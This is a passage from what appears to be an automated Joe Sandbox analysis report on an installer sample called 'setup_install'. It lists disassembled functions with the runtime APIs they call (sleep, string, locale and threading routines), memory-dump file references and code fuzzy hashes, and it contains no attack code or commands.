                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • fprintf.MSVCRT ref: 6494165D
                                        • exit.MSVCRT ref: 64941669
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$exitfprintf
                                        • String ID: $$'$Assertion failed: (%s), file %s, line %d$H
                                        • API String ID: 24197342-762737505
                                        • Opcode ID: 1a9f7626ed229891f0d0e977eec6d4832d34b9bf469be7c3ea91126dc77f9acb
                                        • Instruction ID: f4e09460768a2f3d3f82781087233cbcbb5d63732144355c3ff387cc0a35de85
                                        • Opcode Fuzzy Hash: 1a9f7626ed229891f0d0e977eec6d4832d34b9bf469be7c3ea91126dc77f9acb
                                        • Instruction Fuzzy Hash: EF4127B56883018FD310EF29E48461EBBF5FF96358F10892DE8988B340E735E855CB92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: A,J$A,J
                                        • API String ID: 4096897932-3960289448
                                        • Opcode ID: 23564d9f278e259d7991021690f0f8457fa8c4b18cd70159d440db26347ba0d1
                                        • Instruction ID: f1532a0e1b35520f70e663d9a691094302bf38ced050ccaf1e9147a996a43a67
                                        • Opcode Fuzzy Hash: 23564d9f278e259d7991021690f0f8457fa8c4b18cd70159d440db26347ba0d1
                                        • Instruction Fuzzy Hash: AA21E4B06093049FD740EF69D18569EFBE0EF88358F41892EF5C8D7312E77898819B86
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen$memcpystrcmp
                                        • String ID: *$XjJ
                                        • API String ID: 566201450-163032186
                                        • Opcode ID: b403c6d1c831a1acde9eed242c655a5d4883552282975c43d21fe525d627b4d1
                                        • Instruction ID: a4fe201439f620883ddbd6e9045e6a91d467bc669ca58a6b90b41cc0be5b1d4d
                                        • Opcode Fuzzy Hash: b403c6d1c831a1acde9eed242c655a5d4883552282975c43d21fe525d627b4d1
                                        • Instruction Fuzzy Hash: 4FA14A71608611CFCB00EF29D08065EBBE1EF88304F55C96EE8989B346D739E845DB9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen$memcpymemsetstrcmp
                                        • String ID: *$XjJ
                                        • API String ID: 1303273620-163032186
                                        • Opcode ID: 4e208bc4532878ca1fc697e58cfe62dacc8e2b705aae9e991e01cb12a5e5b0b7
                                        • Instruction ID: c84fa2cd5b087d5033b27c961e38efd3be2a59e7ad3f9698a9dd6785a4cb30a7
                                        • Opcode Fuzzy Hash: 4e208bc4532878ca1fc697e58cfe62dacc8e2b705aae9e991e01cb12a5e5b0b7
                                        • Instruction Fuzzy Hash: 0B816CB5A056108FCB00EF29D48865EFBF5FF88314F4585AEE8859B321D735E845CB86
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: )$HCJ$KCJ
                                        • API String ID: 1004003707-1204724174
                                        • Opcode ID: 5d9c9dc4ba13e1e00770abbf5d361528a07d903842089d458e0efe53c8172aa2
                                        • Instruction ID: c8ab03de61885aba7daf93ff69b776911636b45ef14813a2dff48fd826732978
                                        • Opcode Fuzzy Hash: 5d9c9dc4ba13e1e00770abbf5d361528a07d903842089d458e0efe53c8172aa2
                                        • Instruction Fuzzy Hash: 0FE15C74608301CFCB11CF28C48479ABBE1AF99314F19897AEC895F346C779E855CB96
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: )$NCJ$PCJ$QCJ
                                        • API String ID: 1004003707-1353880924
                                        • Opcode ID: 7b6588ec5e35c57e2ce984c6a26d6a68a77ed945f90186625a8bf9c76c26a6e1
                                        • Instruction ID: d5829f083aeedb66a67b3239c724206b8db2c39574e9af5c011da565b72a8749
                                        • Opcode Fuzzy Hash: 7b6588ec5e35c57e2ce984c6a26d6a68a77ed945f90186625a8bf9c76c26a6e1
                                        • Instruction Fuzzy Hash: 2BD1F870108242CFCB11DF18C4C47A9BBE1AF59318F0985BAEC895F35BC7B99885DBA5
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00496F74
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00496F81
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00496FA1
                                        • pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 00496FAE
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00496FBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_once$pthread_cond_broadcastpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 2735080877-129645102
                                        • Opcode ID: cfdcc70aea794bf11e56da8099a8f06f2ceac82ba9ce8656ccd518b280749dad
                                        • Instruction ID: 930e7aa5e6edef1ae5a77c2519aca1f1f69a435244284f8ebb0f9fccada950ca
                                        • Opcode Fuzzy Hash: cfdcc70aea794bf11e56da8099a8f06f2ceac82ba9ce8656ccd518b280749dad
                                        • Instruction Fuzzy Hash: AC512B705456008ACF107F7AC48A22EBEE1AF5234CF06993EE5845B753DB7C9484C7AE
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00497158
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00497165
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00497184
                                        • pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 00497191
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 004971A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_once$pthread_cond_broadcastpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 2735080877-129645102
                                        • Opcode ID: 23dc7a50f40ad90740d79a23faa2eb588973f038439d5a03c146e98a053721bd
                                        • Instruction ID: 775bddfed98edd1dfece01d6c8a5d9538eeece84b8935b8960f05ea5e3387447
                                        • Opcode Fuzzy Hash: 23dc7a50f40ad90740d79a23faa2eb588973f038439d5a03c146e98a053721bd
                                        • Instruction Fuzzy Hash: 2751FB705096008ADF107F76C48A22EBEE1AF5234CF06993EE5845B753DB7D9484C7AE
                                        APIs
                                        • Sleep.KERNEL32(?,?,?,?,?,?,00000000,649413C7), ref: 64941077
                                        • _amsg_exit.MSVCRT ref: 649410B4
                                        • Sleep.KERNEL32(?,?,?,?,?,?,00000000,649413C7), ref: 649410F0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$_amsg_exit
                                        • String ID:
                                        • API String ID: 2363106680-0
                                        • Opcode ID: f7f75727a2dd23a81957e1cb190c5b6ffc83549422a42600a46acb2e60445d05
                                        • Instruction ID: 15978ef8e7a03c687e922c33e11a76cd584becd45666ec274e263b518fc99e9a
                                        • Opcode Fuzzy Hash: f7f75727a2dd23a81957e1cb190c5b6ffc83549422a42600a46acb2e60445d05
                                        • Instruction Fuzzy Hash: 31418EB0ACC3518BEB04EF28C58A74A7FF9FB47344F508A29D8848B245E775D490CB92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: SJ
                                        • API String ID: 4096897932-3819844229
                                        • Opcode ID: 31f1891d166b36e942c50cd02af1d0f5e3d1e68bade23cc6733cb2e485a68483
                                        • Instruction ID: be167bbe5098dc908586ec92a8d52b4ce5705f71f6316f7914c3545c114fb529
                                        • Opcode Fuzzy Hash: 31f1891d166b36e942c50cd02af1d0f5e3d1e68bade23cc6733cb2e485a68483
                                        • Instruction Fuzzy Hash: 69318EB0908705ABC701BF15D58179ABFF0FB49384F11486EE6C587361E7398891CB9A
                                        APIs
                                        • Sleep.KERNEL32 ref: 64946F0B
                                        • Sleep.KERNEL32 ref: 64946EFD
                                          • Part of subcall function 64942FA0: FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE,?,?,?), ref: 64942FC6
                                          • Part of subcall function 64942FA0: free.MSVCRT(?,?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE), ref: 64942FE9
                                        • free.MSVCRT ref: 64946F26
                                        • CloseHandle.KERNEL32 ref: 64946ECE
                                          • Part of subcall function 64942EB0: ReleaseSemaphore.KERNEL32(?,?,?,00000000,?,?,?,64944D20), ref: 64942EFC
                                        • _errno.MSVCRT ref: 64946F38
                                        • _errno.MSVCRT ref: 64946F58
                                        • _errno.MSVCRT ref: 64946F73
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$CloseSleepfree$ChangeFindHandleNotificationReleaseSemaphore
                                        • String ID:
                                        • API String ID: 4138788905-0
                                        • Opcode ID: 92be039fdf94c63c11c2dd83f2b68107d81e1178f605496971cf59e728731a19
                                        • Instruction ID: 906944e899c7ee6cdba55aa809eda82f012ab30f1daa23f899033dcd120ba93b
                                        • Opcode Fuzzy Hash: 92be039fdf94c63c11c2dd83f2b68107d81e1178f605496971cf59e728731a19
                                        • Instruction Fuzzy Hash: 722186B15886158BE700AF78D48425EBFB4FF01364F115A59E8E887380DB34D850CFA2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: SJ
                                        • API String ID: 4096897932-3819844229
                                        • Opcode ID: 69921fa1e262df55140dd5833e7b90d433ad28dbfb102bd42ecac495beae1909
                                        • Instruction ID: a827d8aa9369b6bb23e44806dcf5ffb079df54b06ea0dfd2bc32fb0fcfa9b4d9
                                        • Opcode Fuzzy Hash: 69921fa1e262df55140dd5833e7b90d433ad28dbfb102bd42ecac495beae1909
                                        • Instruction Fuzzy Hash: E82141B1A0C3459AC702BF25C58079EBFF0EB46784F11489EE5C597262E33988918B9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: SJ
                                        • API String ID: 4096897932-3819844229
                                        • Opcode ID: 42b31b86f0b27c17474c7d6f277994f91e1340138fc3f0d498c82fc1590b57b0
                                        • Instruction ID: d6315ef564f79e3e6211f83f6e687cda52ca573428465e291f75cefdfc06296a
                                        • Opcode Fuzzy Hash: 42b31b86f0b27c17474c7d6f277994f91e1340138fc3f0d498c82fc1590b57b0
                                        • Instruction Fuzzy Hash: 0C2160B19083059FDB02BF15C58079ABFF4FB49784F11482EE9C587361E33998948B9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$CreateSemaphorecallocfree
                                        • String ID:
                                        • API String ID: 2040119499-0
                                        • Opcode ID: c668ece4426f35e080742488194e905930ec51b03dd80f5d8881c30df5085e09
                                        • Instruction ID: ae910fbc6fa32d062186c2a72df364ff7452ccb3633f621e5ee46154c868cff0
                                        • Opcode Fuzzy Hash: c668ece4426f35e080742488194e905930ec51b03dd80f5d8881c30df5085e09
                                        • Instruction Fuzzy Hash: 93213DB16882109FEB106F69C54835E7FE5EF42364F158658EC688B3D0D778CD60DBA2
                                        APIs
                                        Strings
                                        • M%p %d %s, xrefs: 64942E97
                                        • M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s, xrefs: 64942E6E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentThreadprintf
                                        • String ID: M%p %d %s$M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
                                        • API String ID: 2356641437-4089461704
                                        • Opcode ID: aa90dc517b67e74390cbe8a2d630ccb9351a8b5861b5c024666a05db2b1ad8ab
                                        • Instruction ID: 3d066a1fa89851a6b440f176ce42c419914d78daba26d6ee6e56cd2ecff06933
                                        • Opcode Fuzzy Hash: aa90dc517b67e74390cbe8a2d630ccb9351a8b5861b5c024666a05db2b1ad8ab
                                        • Instruction Fuzzy Hash: DC2167B8949301AF8744DF0AD58480AFBE5FFD9660F65896EE88897320D730E940CF92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
